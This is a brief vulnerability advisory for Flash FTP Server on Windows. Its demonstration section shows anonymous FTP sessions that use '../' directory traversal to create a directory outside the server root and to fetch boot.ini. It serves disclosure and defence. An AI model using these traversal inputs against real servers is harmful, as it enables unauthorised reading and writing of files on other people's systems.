Flash FTP server v1.0 for Windows directory traversal vulnerability - Allows remote anonymous users to read and write to any file on the system.
060e28c319424d2701b9af03f203635af83a4e4a31fae87dbf50bb89aeba7bfb
Flash Ftp server 1.0 Directory traversal
Release Date:
January 1, 2004
Systems Affected:
Flash FTP Server is a powerful, flexible, and easy-to-set-up FTP server for all Windows
platforms. Some bugs were found that will allow a malicious user to write and read anywhere
on the disk.
Demonstration:
--------------
[1]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.
[2]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini
Suggestions:
Allow only trusted users access to systems. Log creation of files/directories on systems
to identify malicious users.
Patch:
Not yet available
credit:
dr_insane
http://members.lycos.co.uk/r34ct/